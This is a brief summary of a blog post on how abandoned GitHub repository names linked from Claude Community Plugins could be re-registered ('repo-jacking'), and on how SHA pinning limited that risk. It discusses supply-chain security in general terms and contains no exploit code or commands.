Repo-Jacking Anthropic's Claude Community Plugins (and the SHAs That Saved Them) (johnstawinski.com)

Recent vulnerabilities have been discovered in Claude Community Plugins, raising significant concerns about supply chain security in AI/ML platforms. The plugins were susceptible to "repo-jacking," a type of attack where malicious actors could reclaim and exploit abandoned repository names linked in the plugin marketplace. Although Claude Code employs SHA checks to ensure the integrity of downloaded plugins, the "view plugin UI" feature could mislead users to a repurposed malicious repository, illustrating a dangerous social engineering approach within trusted environments. This incident underscores a broader issue in the AI tooling landscape, where the automation of installations can amplify risks associated with software supply chains. As AI agents execute commands autonomously, unintentional exposure to compromised code becomes a critical concern. The plugin marketplace’s reliance on SHA pinning adds a layer of protection; however, it is not foolproof, as malicious repositories could still potentially bypass integrity checks through flawed update processes. This situation calls for heightened vigilance and improved security protocols in plugin ecosystems, emphasizing the need for organizations to treat third-party code, even from reputable sources, as potentially untrusted. As AI tooling continues to evolve, lessons learned from this vulnerability will be crucial for strengthening supply chain defenses.